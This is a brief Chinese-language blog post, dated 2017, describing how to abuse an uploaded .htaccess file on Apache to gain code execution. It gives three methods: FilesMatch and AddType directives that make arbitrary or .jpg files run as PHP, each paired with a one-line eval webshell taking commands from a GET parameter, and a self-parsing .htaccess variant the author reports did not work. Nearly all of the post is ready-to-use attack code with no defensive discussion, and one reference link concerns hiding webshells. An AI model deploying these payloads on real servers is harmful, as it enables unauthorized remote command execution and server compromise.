.htaccess 文件上传
2017-07-17 本文已影响248人
王一航
利用代码 :
.htaccess
法一
# FileMatch 参数即为文件名的正则匹配
<FilesMatch "sniperoj">
SetHandler application/x-httpd-php
</FilesMatch>
// sniperoj
<?php eval($_GET['c']);?>
法二
AddType application/x-httpd-php .jpg
// filename.jpg
<?php eval($_GET['c']);?>
法三
# 自解析的 .htaccess
<Files "\.htaccess">
Allow from all
</Files>
<FilesMatch "\.htaccess">
SetHandler application/x-httpd-php
# <?php eval($_GET[c]);?>
</FilesMatch>
# 不过这种方式测试并没有成功... 暂时不清楚原因
参考链接 :
1. .htaccess官方文档
2. SetHandler官方文档
3. 非法文件上传漏洞技术
4. 隐藏webshell的几条建议
5. .htaccess based attack
